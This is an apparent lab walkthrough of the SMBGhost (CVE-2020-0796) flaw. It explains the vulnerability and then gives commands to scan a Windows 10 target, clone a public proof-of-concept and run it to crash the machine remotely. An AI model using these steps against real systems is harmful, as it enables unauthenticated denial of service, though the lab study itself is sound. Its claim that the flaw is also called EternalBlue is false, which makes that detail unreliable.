How to Manually Exploit the Windows 10 SMBGhost Vulnerability

What is the SMBGhost Vulnerability?

The SMBGhost Vulnerability is a buffer overflow vulnerability (CVE-2020-0796) found in Windows 10 and Windows Server. This “wormable” remote code execution (RCE) vulnerability has also been called EternalDarkness and EternalBlue. This vulnerability exists within the Microsoft Server Message Block (SMB) protocol, which allows devices to share resources like printers and files across a network.

A critical vulnerability in SMB version 3.1.1 allows an attacker to inject a malicious payload into a compressed SMB connection. When the stream is decompressed by a client or server, the attacker’s controlled data overflows a memory buffer, resulting in a buffer overflow. As a result, malicious code can be executed in memory with system-level privileges.

The vulnerability is considered wormable because the exploit can be executed before authentication occurs. This means malware could exploit the flaw, then use the compromised system to scan for and attack other vulnerable machines on the network.

Vulnerable systems include:

• Windows 10 (Versions 1903, 1909)
• Windows Server (Versions 1903, 1909)

---

Scanning a Windows 10 Machine for the Vulnerability

Running an nmap scan on the target windows 10 machine shows that port 445 is open, which is required for this exploit to work:

Next, we can search for a tool on GitHub that would determine whether a target machine is susceptible to this attack – without crashing or exploiting it as yet. For this lab, I used the CVE-2020-0796 Python scanner found here.

In a terminal, clone the repository with:

git clone https://github.com/ButrintKomoni/cve-2020-0796

Since it’s a Python 3 program, run the scanner with:

python3 cve-2020-0796-scanner.py <ip address>

Running the program confirms the Windows 10 system is vulnerable:

Crashing the Target System

At this point, we can use another tool to either crash or exploit the target machine. The python tool I used to crash the remote system can be found here.

In the terminal, I changed my directory to the Desktop and cloned the repository:

cd Desktop
git clone https://github.com/jiansiting/CVE-2020-0796

Then, navigate into the directory:

cd CVE-2020-0796
ls

You’ll see the Python exploit file:

Inside the script, the only data you need to modify is the target IP address:

nano cve-2020-0796.py

python3 cve-2020-0796.py <ip address>

After running the exploit, my Windows 10 machine crashed in about 15 seconds:

The target machine successfully crashed!

This is a critical vulnerability because no system should be able to crash remotely just by knowing its IP address, especially without any authentication. It highlights the importance of timely security patches and ongoing vulnerability scanning in any environment.